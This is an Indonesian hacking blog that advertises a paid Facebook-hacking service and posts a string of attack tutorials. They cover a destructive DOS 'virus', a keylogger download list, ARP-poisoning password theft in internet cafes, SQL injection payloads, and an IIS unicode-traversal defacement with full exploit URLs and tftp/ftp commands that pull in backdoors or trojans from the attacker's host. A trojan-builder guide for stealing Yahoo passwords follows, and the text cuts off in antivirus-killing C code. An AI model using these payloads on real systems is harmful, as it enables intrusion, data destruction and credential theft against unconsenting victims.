Minggu, 04 Oktober 2009
SAYA MEMBUKA JASA HACK FACEBOOK
DI BAYAR DENGAN PULSA M3 50 RB
BERMINAT ?????
MESSAGE KE FB SAYA DI
b4ngs4t_1107@yahoo.com
Kamis, 24 September 2009
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
iam b4ngs4t 1107
cara membuat virus !!!
Membuat program perusak (seperti virus) merupakan keinginan sebagian para pemula komputer, tapi bagaimana mereka bisa membuat kalau mereka tidak tahu bahasa pemograman sama sekali, anda jangan resah untuk masalah ini karena saat ini penulis akan mengajarkan anda cara membuat program perusak (virus) yang sangat sederhana sekali tapi sangat mematikan bahkan bisa dikatakan lebih mengerikan dari program perusak manapun.
Pertama kali skill yang anda butuhkan adalah dasar DOS, tanpa ini anda akan sulit untuk berkreasi dalam membuat program ini tapi jika anda tidak tahu dasar perintah DOS maka anda cukup copy paste saja, bahasa pemograman yang akan kita pakai adalah Turbo Basic v1.0, anda dapat mendownloadnya di Google.
Diatas adalah tampilan Turbo Basic, jika anda buta pemograman Turbo Basic maka anda masuk ke Edit lalu anda tulis Source Code program perusak.
shell "Perintah DOS"
dengan diawali kata shell maka anda dapat menjalankan perintah DOS pada program, misal anda membuat :
shell "c:"
shell "cd\"
shell "del command.com"
Diatas adalah contoh menghapus DOS pada DOS Classic, Windows 95/98 sehingga pengguna komputer tidak dapat booting, kita contohkan yang lain.
shell "c:"
shell "cd\"
shell "deltree /y mydocu~1"
shell "deltree /y windows"
shell "deltree /y progra~1"
Diatas adalah contoh menghapus Directory My Document, WIndows dan Program FIles, sangat fatal bukan ?
Setelah anda selesai membuat programnya maka anda save dahulu, caranya pilih File lalu Save lalu beri nama filenya misal VIRUS.BAS, setelah itu baru kita mengcompile source code tadi, caranya pilih Options lalu pilih Compile to EXE file, setelah itu masuk ke pilihan compile lalu anda enter, maka source code tersebut akan menjadi file EXE.
Jika file EXE tersebut dijalankan maka komputer anda akan menjalankan perintah DOS pada program, dari tutorial diatas, anda dapat berkreasi sendiri bagaimana virus buatan anda dapat berjalan sesuai dengan anda inginkan, perlu diketahui bahwa TIDAK ADA SATU ANTIVIRUS DIDUNIA INI DAPAT MENDETEKSI PROGRAM INI ADALAH VIRUS jadi anda bebas mengcopykan program ini ke komputer manapun yang anda suka kecuali komputer berbasis non DOS atau Windows, hehe
Tujuan dari tutorial ini adalah agar kita lebih waspada terhadap berbagai file dengan ekstensi *.exe meskipun file *.exe tersebut 100% dinyatakan bebas virus dari berbagai jenis Antivirus.
Penulis :
Yogya Family Code
*Segala kesalahan error / kerusakan pada komputer dan semacamnya adalah tanggung jawab anda !
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda
63 pilihan keylogger
Jelas keylogger ini bersifat kontroversial seperti 2 mata pisau, positif, negatif, membangun dan menghancurkan. Tidak cukup waktu untuk mendiskusikan semua hal tersebut.
Untuk menambah koleksi hacking tools anda, :D silahkan unduh 63 keylogger terbaru yang cukup handal ...
Berikut daftarnya :
1. 007 Keylogger Spy Software 3.873
2. Active Key Logger 2.4
3. Activity Keylogger 1.80.21
4. Activity Logger 3.7.2132
5. ActMon Computer Monitoring 5.20
6. Actual Spy 2.8
7. Advanced Invisible Keylogger v1.9
8. Advanced Keylogger 1.8
9. Ardamax Keylogger 2.9
10. BlazingTools Perfect Keylogger 1.68
11. Blazingtools Remote Logger v2.3
12. Data Doctor KeyLogger Advance v3.0.1.5
13. Local Keylogger Pro 3.1
14. ExploreAnywhere Keylogger Pro 1.7.8
15. Family Cyber Alert 4.06
16. Family Keylogger 2.80
17. Firewall bypass Keylogger 1.5
18. Free Keylogger 2.53
19. Ghost Keylogger 3.80
20. Golden Eye 4.5
21. Golden KeyLogger 1.32
22. Handy Keylogger 3.24 build 032
23. Home Keylogger 1.77
24. Inside Keylogger 4.1
25. iOpus Starr PC and Internet Monitor 3.23
26. iSpyNow v2.0
27. KeyScrambler 1.3.2
28. Keystroke Spy 1.10
29. KGB Keylogger 4.2
30. KGB Spy 3.84
31. LastBit Absolute Key Logger 2.5.283
32. Metakodix Stealth Keylogger 1.1.0
33. Network Event Viewer v6.0.0.42
34. OverSpy v2.5
35. PC Activity Monitor Professional 7.6.3
36. PC Spy Keylogger 2.3 build 0313
37. PC Weasel 2.5
38. Personal PC Spy v1.9.5
39. Power Spy 6.10
40. Powered Keylogger v2.2.1.1920
41. Quick Keylogger 2.1
42. Radar 1.0
43. Real Spy Monitor 2.80
44. Real Spy Monitor 2.80
45. Remote Desktop Spy 4.04
46. Remote KeyLogger 1.0.1
47. Revealer Keylogger Free 1.33
48. SC Keylogger Pro 3.2
49. Smart Keystroke Recorder Pro
50. Spector Pro 6.0.1201
51. SpyAnytime PC Spy 2.42
52. SpyBuddy 3.7.5
53. Spytech SpyAgent 6.02.07
54. Spytector 1.3.5
55 Stealth Key Logger 4.5
56. System keylogger 2.0.0
57. Tim’s Keylogger 1.0
58. Tiny Keylogger 2.0
59. Total Spy 2.7
60. Windows Keylogger 5.04
61. Win-Spy Pro 8.9.109
62. XP Advanced Keylogger 2.5
63. XPCSpy Pro version 3.01
cain and abel
Teknik ini bisa disebut juga dengan tehnik poisoning/Spoofing kalo ga salah, ato kalo menurut gw, peracunan/penipuan terhadap target.... bingung???
Okee gw jelasin....
Kenapa gw bilang peracunan/penipuan??karna disini kita melakukan penipuan terhadap komputer target melalui mac address komputer gateway, sehingga kita akan mencoba menipu komputer target agar percaya bahwa mac addres komputer gateaway adalah mac addres komputer yang kita pakai...!!!!jadi semua data yang dikirim komputer target akan melewati komputer kita terlebih dahulu..!!!Lol
Dengan tehnik ini kita bisa mencuri username n password, ftp,http,imap,pop3,smb,telnet,vnc,tds,icq,mysql,dll ato bahkan pada situs yang secure sekalipun, yang kebanyakan diawali dengan Https, ex:yahoo mail,internet banking...>>-A
Sekarang saat_nya mendapatkan password tanpa menyerang komputer target secara langsung...!!!
Oke apa yang kita perlukan:
# warnet dengan rame pengunjung... Wi-fi/hotspot juga bisa!!!
yups... karna disini kita melakukan snifer terhadap pengunjung warnet yang melakukan login untuk mendapatkan username N password...
# Dude 2.1 Cari di abang Google.....
aplikasi untuk memonitor network, agar kita tahu pc yang aktive dijaringan, sekalian untuk melakukan komunikasi dengan seluruh jaringan yang ada...
# Cain N abel versi terserah Cari di www.oxid.it ato googling ajee...
Nah ini dia senjata untuk snifer kita kali ini... saat tulisan ini dibuat penulis memakai versi terbaru yang baru di rilis yaitu. V.4.9.4
Setelah semua_Nya siap dan telah terinstal jalankan dude 1.2 kemudian discover Network dan program_Pun akan menampilkan PC yang aktive saat itu lengkap dengan IP address_Nya...
Lalu jalankan program Cain N abel, jangan lupa pilih ethernet card yang dipakai pada bagian configure, start sniffer, klik tab sniffer pada bagian host disana terlihat beberapa komputer lengkap dengan alamat IP N mac adress_Nya, bingung, program cain tahu darimana??? Program cain mengetahui alamat tersebut melalui komunikasi yang dilakukan oleh program Dude, sebenernya pake Ping juga bisa>>-A
Ato bisa juga dengan klik kanan pilih scan mac addres klik ok.
Kemudian klik pada tab APR bagian bawah, lalu klik gambar tanda tambah pada bagian atas pilih salah satu ato semua alamat IP address yang akan di_tipu/diracuni klik ok N start apr.
Setelah semuanya selesai poisoning akan dilancarkan dan kita tinggal menunggu memanen password N username sambil chating n minum susu ...
untuk melihat hasil kerja program cain tinggal klik APR ato Passwords pada bagian bawah....
Penutup :
Tulisan ini hanya sebagai pembelajaran saja penulis tidak bertanggung jawab apabila disalah gunakan, semoga kita tidak menjadi korban internet....
NB :
Pada saat melakukan tester di dua warnet yang berbeda, sebagian pengunjung warnet protes kepada operator karna koneksi internet_Nya menjadi sangat lambat bahkan tidak terkoneksi sama sekali....!!
anda jangan pernah berfikir bahwa tehnik ini tidak akan bisa diketahui oleh orang lain, dilain waktu insya Allah gw akan ngejelasin bagaimana cara untuk mencegah serangan ini, dan mencari tahu siapa pelakunya. Untuk itu berhati-hatilah anda jika melakukan aksi ini....!!>>-A
Untuk melihat hasil dari aksi ini :
http://www.geocities.com/here_4li3n/pass.jpg
Referensi :
www.oxid.it
www.irongeek.com
4L13N Special's Thank's:
ALLAH SWT N Rosul2xnya beserta keluarga dan sahabatnya
AwN24 You Are My Inspiration
Jarul_Kidi3 Jangan berenti ngebimbing gw oke!!!
GiberWay_Community N Gondrong's_Community
N semua virologers...
mengendalikan pc dari jarak jauh dengan radmin ...
Bagi temen-temen, mungkin sudah tahu mengenai aplikasi seperti VNC, PC Anywhere, dl. Aplikasi – aplikasi tersebut bisa digunakan untuk meremote komputer dari jarak jauh syarat utamanya asalkan komputer terhubung dengan jaringan seperti Internet, LAN atau WAN hal ini berguna apabila kita ingin melakukan semacam troubleshooting, atau hanya sekedar untuk melihat-lihat saja.
Kali ini saya akan sedikit membahas tentang instalasi Radmin yang juga salah satu aplikasi untuk meremote pc (Artikel seperti ini mungkin sudah sering dilihat, jadi artikel ini buat yang belum tau aja, yang udah tau lewatkan saja artikel ini)

Langkahnya yaitu:
1. Install aplikasi Radmin server pada komputer yang akan diremote – jalankan program Radmin 3.1 server (rserv31) – Klik next, klik accept, klik install-finish
2. Jika sudah selesai lanjutkan dengan konfigurasi – klik permissions-pilih Radmin security-klik permission – klik add user, masukkan user name dan password yang anda inginkan – klik Allow pada All Access,klik OK, OK, Klik Exit
3. Konfigurasi firewall diPC tersebut – klik Start – Settings – Control Panel, windows firewall – tab exception, klik add port – pada kotak name masukkan “Radmin” (tanpa tanda kutip) – pada kotak port number dengan “4899″, (tanpa tanda kutip), klik Ok – jika program radmin sudah masuk di list exception klik Ok
4. Install aplikasi Radmin viewer di PC yang akan meremote – jalankan file radmin viewer (rview31) – klik tomobil Add New Connection – masukkan nama PC yang anda inginkan dan isi juga IP address pc tersebut, OK – lalu double klik pada pc yang ingin dikendalikan.
5. Pc sudah bisa dikendalikan – jalankan program Radmin viewer – double click pada gambar PC yang ingin anda kendalikan. – Masukkan username dan password yang telah dibuat – komputer sudah bisa di remote

Atau anda juga bisa melihat demo video di situs http://www.radmin.com if u re not make it find it by ask to google and let it ur self to explore your brain download Radmin 3.1 di sini
tutorial mysql
Nah, buwat previewnya, kamu harus tahu dulu, kalo MySQL tuh adalah sebuah server database open source yang kayaknya paling populer keberadaannya. MySQL umumnya digunakan bersamaan dengan skrip PHP untuk membuat aplikasi server yang dinamis dan powerful.
Pada database yang memiliki struktur relasional. Ada tabel-tabel yang menyimpan data. Setiap tabel terdiri dari kolom dan baris. Sebuah kolom mendefinisikan jenis informasi apa yang akan disimpan. Kamu memerlukan kolom khusus untuk setiap jenis informasi yang ingin kamu simpan (misalnya umur, tinggi, berat, alamat)
Kalau kolom mendefinisikan jenis informasi apa yang akan disimpan, maka sebuah baris adalah data aktual yang disimpan. Setiap baris dari tabel adalah masukan dari tabel tersebut dan berisi nilai-nilai untuk setiap kolom tabel tersebut. (contoh masukannya adalah Bambang: umur 40 tahun, 65 kg dan 160cm). Jika pembahasan database ini membingungkan buat kamu, jangan putus asa, kita akan membahas dan menunjukkan beberapa contoh tabel dalam tutorial selanjutnya.
Mengapa menggunakan Database?
SQL?
Ok, berikutnya kita akan mencoba mengenal istilah yang sangat penting dalam SQL yaitu Pengenalan Query.
sql injection
Udah pada tau kan soal SQL injection?
Yah kalo belum baca deh Tutorialnya (dulu pernah ta buat)
Itu tutorial basic, sekarang kita ke tutorial advance.
Disini ga akan dibahas gimana cara inject nya tapi berbagai syntax yang bisa kita gunakan
untuk menginject suatu website (jika emang bisa diinject).
Oke, lets’ begin
Syntax SQL Injection
1. Commenting out.
Gunanya untuk mengakhiri suatu query, bypass query.
+ SQL Server
Syntax: –
Penggunaan: DROP namatabel;–
+ MySQL
Syntax: #
Penggunaan: DROP namatabel;#
Contoh penggunaan in real life:
* Username: admin’–
* Proses query yang terjadi di server:
SELECT * FROM userlist WHERE username=’admin’–’ AND password=’password’;
Query ini akan memberikan km akses sebagai admin karena query selanjutnya setelah — akan diabaikan
2. Inline comment
Gunanya untuk mengetahui versi SQL server yang digunakan atau untuk bypass script proteksi
+ SQL Server (MySQL juga bisa)
Syntax: /*Comment*/
Penggunaan: DROP/*comment*/namatabel
atau: DR/**/OP/*bypass proteksi*/namatabel
atau: SELECT/*menghindari-spasi*/password/**/FROM/**/userlist
+ MySQL (mendeteksi versi)
Syntax: /*!MYSQL Special SQL*/
Penggunaan: SELECT /*!32302 1/0,*/1 FROM namatabel
Note: Syntax juga bisa digunakan jika versi MySQL lebih tinggi dari 3.23.02 (sesuai query), tidak berfungsi untuk versi dibawahnya
3. Staking queries
Gunanya untuk menyambung 2 buah query dalam 1 transaksi.
+ SQL Server
Syntax: ;
Penggunaan: SELECT * FROM namatabel; DROP namatabel–
4. Pernyataan IF
Ini kunci jika melakukan Blind SQL Injection, juga berguna untuk testing sesuatu yang ga jelas secara akurat
+ SQL Server
Syntax: IF kondisi bagian-true ELSE bagian-false
Penggunaan: IF (1=1) SELECT ‘true’ ELSE SELECT ‘false’
+ MySQL
Syntax: IF(kondisi,bagian-true,bagian-false)
Penggunaan: SELECT IF(1=1,’true’,’false’)
5. Operasi String
Gunanya untuk bypass proteksi
+ SQL Server
Syntax: +
Penggunaan: SELECT login + ‘-’ + password FROM userlist
+ MySQL Server
Syntax: ||
Penggunaan: SELECT login || ‘-’ || password FROM userlist
Note: Jika MySQL server dalam mode ANSI syntax berfunsi. Cara lain adalah dengan menggunakan fungsi CONCAT() dalam MySQL.
Syntax: CONCAT(str1,str2,str3,…)
Penggunaan: SELECT CONCAT(login,password) FROM userlist
6. Union Injection
Gunanya menggabungkan 2 tabel yang berbeda dengan syarat tabel itu harus sama jumlah kolomnya.
Syntax: UNION
Penggunaan: ‘ UNION SELECT * FROM namatabel
atau: ‘ UNION ALL SELECT * FROM namatabel
atau: ‘ UNION SELECT kolom1,kolom2 FROM namatabel
Proses yang terjadi dalam query:
SELECT * FROM user WHERE id=’1′ UNION SELECT kolom1,kolom2 FROM namatabel
tutorial deface
Mudahn Tutorial Ini Berarti
Tutorial Unicode By Jangkr|k/Ga|b ( Crew Of MinangCrew, Hackermuda, Makassarhack, K-elektronik, Deface-team, Padanghacking, Indohack, Aritechdev, Neoteker, Indoprovider, Validcc, Medanhacking ...etc)
Os Target Windows Nt /9x
Ini HendakNya Dijadikan Bahan Percobaan yang Bermanfaat Yach
DediCated Toturial To : Pepole On irc.dal.net
chanel: #MinangCrew, #K-elektronik,#Hackermuda, #Deface-team, #Makassarhack, #Indohack
#IndoCarding, #Cracxer,#Cacing,#CrackerLink, #MedanHacking, #Aritechdev,#Neoteker ...etc
__________________________________________________ __________
1. Kita Harus menentukan WebSite Target/ Sasaran Kita : www.target.loe contoh-->> www.target.com
2. Login
Ini Merupakan Directory yang Ada Di Web Site Tersebut
Directory Ini Di Configurasi Dengan Script tertentu Supayafile dalam Web tersebut Berhubungan Jika terjadi bug pada script nya maka kita bisa bembus web ini
ada beberapa contoh login diantaranya :
a)/_vti_bin
b)/_vti_cnf
c)/cgi-bin
d)/scripts
e)/msadc
3. Unicode --->> merupakan code yang dapat membaca script configurasi website tersebut code ini yang dapat membaca bug cgi nya
hasil codingnya seperti bisa 1-3 x pengulangan tergantung target yang akan kita hackinng
a) ..%c1%1c..
b) ..%c0%9v..
c) ..%c0%af..
d) ..%c0%qf..
e) ..%c1%8s..
f) ..%e0%80%af..
g) ..%c1%9c..
h) ..%c1%pc..
4. OS target -->>ini Menyatakan Sertificate Web Os kita WinNT dan Win98
0xB5 ISO 8859-1
0xC5 ISO 8859-1
0xEA CP437
0x2140 JIS X 0208
0x22 ISO 8859-1
5. Cara Kerja
Secara Garis Besar deface Ini dilakukan Dengan tiga Cara yaitu :
A.) Deface WebSite Perintah Echo
a.)Secara umum : http://target/login/unicode/os/system/c+dir atau http://www.target.com/login/unicode/os/system/c+dir
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
Jika terdapat Bug Maka Pada title brower kita ada kata CGi Error Maka Kita telah menembus web site itu
Maka Yang terlihat pada brower kita adalah list yang berupa isi hardisk webserver tersebut sama halnya
command dir yang kita lakukan di Dos Prompt
Directory of c:
10/05/2001 19:56 Programs Files
10/05/2001 19:56 Inetpub
08/05/2001 10:23 230 cmd.exe
24/04/2001 04:33 4.620 1home.htm
05/10/2000 12:40 668 about.htm
10/05/2001 19:54 AboutUs
11/05/2001 10:28 131 about_us.htm
28/10/2000 14:49 4.911 about_us.old.htm
b.)Setelah berhasil liat List Hardisk Kita Harus cari Path_Translade web nya dengan menggunakan command /c+dir+c: di ubah menjadi /c+set
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: menjadi http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+set /c+dir+c: di ubah menjadi /c+set
maka Akan keluar CGI error yang isinya menyatakan Configurasi Batch Sytem WebServer tersebut. Keluar Macam - Macam, Yang Perlu dilihat cuma:
Path_Translated=d:\inetpub\wwwroot
c.) Langkah Selanjutnya Adalah Copy file cmd.exe dengan nama baru cmd1.exe atau nama anda contoh Jangkrik.exe dengan mengganti
/c+dir+c: menjadi /c+copy+c:
lalu ditambahkan dengan : winntsystem32cmd.exe+c:jangkrik.exe
sehingga kita dapatkan :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+c:jangkrik.exe
sekarang kamu bisa liat file cmd1.exe udah ada di direktori :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:
Tujuan Ini Sebenarnya untuk menyingkat command pada addres ie kita
d.) Cari halaman index ke www.target.com/blah.ida
Kadang-kadang ekstensi .ida yang tidak diketahui akan merespon lokal path.
Kalo trik .ida tidak bekerja, coba gunakan direktori InetPub :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:inetpub
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:inetpubwwwroot
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+dir+c:inetpubwwwrootindex.htm
sebenarnya langkah ini tidak perlu tapi untuk jaga -jaga kan ngak papa
dengan langkah b.) tadi sebenarnya kita sudah tau dimana letah index.htm nya atau dengan kata lain folder webnya
e.) kalau lo merasa dirinya hacker backup dulu halaman depan web nya, karena hacker kerjanya bukan menghancurkan tapi memperingatkan
hanya orang - orang amatiran atau katalain orang yang berjiwa vandalis yang kerja merusak tanpa backup index.htm nya, jika tidak kita menulisnya dengan nama file baru dengan cara :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+copy+c:inetpubwwwrootindex.htm+c:inetpubwwwrooti ndex.htm.bak
f.) Baru Kita deface atau echo Halaman Depannya dengan command dibawah ini :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+echo+You%20Were%20Hacked+>+c:inetpubwwwrootindex.htm
untuk tidak merusak web nya kita tulis dengan nama file baru
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+echo+You%20Were%20Hacked+>+c:inetpubwwwrootjangkrik.htm
/c+echo+You%20Were%20Hacked+>+c: >>> adalah untuk menuliskan kata-kata You Were Hacked pada
c:inetpubwwwrootindex.htm file yang ditulis atau c:inetpubwwwrootjangkrik.htm file yang ditulis
Untuk Anda yang telah Paham Bahasa Html Kalau pengen Hasil Defacenya keren Gunakan command ini
/c+echo"
This Web Site Hacking BY ....:::J.A.N.G.K.|.K:...
Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda
"+>+c:inepubwwwrootindex.htm
/c+echo"
This Web Site Hacking BY ....:::J.A.N.G.K.|.K:...
Thanks To Pepole On Irc.Dal.net %23MinangCrew And %23Hackermuda
"+>+c:inepubwwwrootjangkrik.htm
keterangan :
%3d adalah pernyataan tanda =
%22 adalah Pernyataan tanda "
%23 adalah pernyataan tanda #
Untuk Anda Yang Paham Html Anda Bisa NGapain aja Tuh Deface Web Anda. Biar Bagus hack deface nya di input pakai Flash juga
g.) Langkah terkahir untuk liat hasilnya Membaca file yang lain dengan menggunakan perintah 'type' :
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+type+c:inetpubwwwrootindex.htm
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../jangkrik.exe?/c+type+c:inetpubwwwrootjangkrik.htm
Atau liat Langsung aja http://www.target.com/ atau www.target.com/jangkrik.htm
Jika dikau menemukan webserver ini dalam penulisannya accses denied ( penolakan penulisan ) Maka langkah kedua yaitu dengan cara tftp:
B.) Deface WebSite Dengan Cara tftp
Deface nya dilakukan dengan meng-upload file lewat TFTP32
Untuk Mendukung Tftp kita download dulu softwarenya http://www.download.com ketik keyword nya TFTP32
Dikau Main Di Kompi diserver (sebab di user pasti takkan bisa).
Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung sajah.
mari kita mulai meng-uploadnyah perintahnya sesuai langkah berikut ini :
a.) Kita Lakukan Langkah a.) (A.)pada deface dengan echo untuk mencari vulnernnya atau bug cginya
sehingga kita mendapatkan holenya atau script nya http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/
langkah selanjutnya yaitu uploadnya lagi. Namun Sebelumnya kita Dah siapkan File htm/html halaman web defacenya ( berkreasi lah dikau disini )
Setelah semua siap baru upload dengan command http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe up-load)+ C:InetPubwwwrootmain.html
b.)Kita liat lagi apa yg terjadi di IE kita.
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :
Waa..waaa .selamat dikau telah berhasil meng-upload file dikau memakai sofwer TFTP32 tadee silahkan buka web site target tadi
Kekurangannyah dalam meng-upload file lewat TFTP32 terkadang suatu server (web site) tidak mau menerima up-load file kita tadee. Jikalau itu terjadi maka gunakanlah cara pertama di atas tadee.
C.) Dengan Cara Ftp Dengan Web Kita Yang Telah Kita Isi Dengan Bahan Deface Kita
Langkah Pertama adalah kita bikin dulu domain gratisan di web server gratisan. di web itu kita drop halaman web deface kita atau backdoor,virus atau program penghancur lainnya
selanjutnya kita lakukan Sama dengan Cara langkah a.)(A.) setelah dikau tau hole cgi bugnya atau unicodennya maka dikau lakukan langkah berikut ini:
a.) Setelah kita menemukan vulnernya
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:
Directory of c:
10/05/2001 19:56
Programs Files
10/05/2001 19:56
Inetpub
08/05/2001 10:23 230 cmd.exe
24/04/2001 04:33 4.620 1home.htm
05/10/2000 12:40 668 about.htm
10/05/2001 19:54
AboutUs
11/05/2001 10:28 131 about_us.htm
28/10/2000 14:49 4.911 about_us.old.htm
b.) Lalu kita lakukan langkah copy sesuai di langkah b.)(A.) ---->>tujuan nya memendekkan command unicode nya
c.) Lalu Kita Liat +set nya untuk melihat patch translade nya
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+set
Kira Nya path nya di c:inetpubwwwroot
d.)Langkah Selanjutnya Yaitu kita membuat script ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+open+geocities.com+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+jangkrik+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+anuamakang+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+ascii+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+get+jangkrik.htm+>>+c:inetpubwwwrootjangkrik.ftp
- http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+echo+close+>>+c:inetpubwwwrootjangkrik.ftp
Setelah Scrip jangkrik.ftp selesai di liat lagi script nya apa benar
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+type+c:inetpubwwwrootjangkrik.ftp
Setelah selesai script tuh kita jalan kan lagi script nya:
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+ftp+-s:c:inetpubwwwrootjangkrik.ftp
buka ie satulagi untuk liat file nya dah smapai belum
http://www.targethost.com/scripts/..%255c..%255c /winnt/system32/cmd.exe?/c+dir+c:inetpubwwwroot
Kalau dah terkirim selamat dah
Keterangan nya :
Pada scrip jangkrik.ftp itu kita muatkan hal ini sebenarnya
open geocities.com --->>> scriptnya --->> +echo+open+geocities.com+>>+c:inetpubwwwrootjangkrik.ftp
jangkrik --->> user name --->>> scriptnya -->> +echo+jangkrik+>>+c:inetpubwwwrootjangkrik.ftp
anuamakang --->>> password --->>> scriptnya -->> +echo+anuamakang+>>+c:inetpubwwwrootjangkrik.ftp
lcd c:inetpubwwwroot --->>> folder tujuan --->>> scriptnya -->>>+echo+lcd+c:inetpubwwwroot+>>+c:inetpubwwwrootjangkrik.ftp
ascii --->>> bentuk file --->>> scripnya --->>> +echo+ascii+>>+c:inetpubwwwrootjangkrik.ftp
get jangkrik.htm ---->>> command tranfer file --->>> +echo+get+jangkrik.htm+>>+c:inetpubwwwrootjangkrik.ftp
close --->> perintah dc ke web server ---->>> scripnya --->>> +echo+close+>>+c:inetpubwwwrootjangkrik.ftp
hehehe Dengan cara ini anda dapat drop apa saja keweb orang tuh baik itu web deface, backdror, ircserver, bot, bnc, psybnc, trojan and virus deh..........
untuk mengirim file yang binary kode bentuk file dari asci di ubah menjadi binary
Catatan :
- Daftar Pustaka
.) Tutorial R3VOLT Anggota #Medanhacking
.) Tutorial Pak_Tani Anggota #Cracxer
.) Tutoriaal Dis0RdeR Anggota #Medanhacking
.) Tutorial Rio_Martin Anggota #IndoSnifing
- Revisi Dan Tambahan Serta edit Dari Janngkr|k
- Kalau Mau Download Software IIS Scaner Di Web Site
. WWW.ElHACKER.NET
. WWW.KEBAM.NET
- Jangan Jadi Cracker Yang merusak kerja nya
ni gw kasi buat cari account yahoo sama password nya
Apa saja yang dibutuhkan??
1. Magic-PS Trojan Generator. Bisa Anda download disini:http://www.ziddu.com/download/3079190/Magic-PS-15se.zip.html
2. File binder(compresser)
3. C Compiler
Target??
1. Pengguna windows
2. User yang masih bisa kena sicial engineering
Proses pembuatan??
1. Matikan semua antivirus yang berada di dalam kompie anda.
2. Buat semua folder untuk menyimpan trojan
3. Copy Magic-PS-15se++ ke dalam folder yang Anda buat, dan eksekusilah trojan generator tersebut.
tampilan seperti ini:
Keterangan Trojan :
1. Victim, pada bagian ini Anda bisa memberikan tugas tambahan pada trojan yang Anda inginkan, misalkan saja mengambil IP Address si target.
2. File After Install, jika trojan ini dieksekusi maka trojan tersebut akan melakukan penyamaran diri berupa file 'regsvr.exe'. Anda bisa memilih file penyamaran lainnya.
3. Y! ID, isi bagian ini dengan account Yahoo milik Anda. Ingat! Account ID milik Anda juga harus Yahoo! dan proses pengisian pada bagian tersebut tidak disertai "@yahoo.com". Jadi cukup mengisi ID saja. Trojan akan mencuri account + password si target kemudian secara otomatis trojan akan mengirim account tersebut ke email Anda (alamat email yang Anda set di trojan loh...)
4. Choose icon, silahkan Anda memilih icon penyamaran trojan.
5. FileName, ini merupakan file trojan hasil generator. File inilah yang nantinya Anda kirim ke target yang menjadi sasaran kita
6. Create MPS merupakan tombol yang men-generate trojan.
Buat pembunuh NAV
Bye bye NAV. Nah, ini adalah routine yang bisa Anda gunakan untuk membunuh NAV secara paksa.
//--- code ----//
/*
Kill Norton AntiVirus (All versions). Local Exploit.
Norton AV can not protect this file : VIRSCAN1.DAT
and can not Detect any virus after modify this file !
(editor: jadi ceritanye nih, file .DAT nya dioverwrite ama data sampah)
*/
#include
int main()
{
HWND Lpbuff;
HKEY handle;
DWORD temp,size;
char buff[255],fName[255],dirName[255];
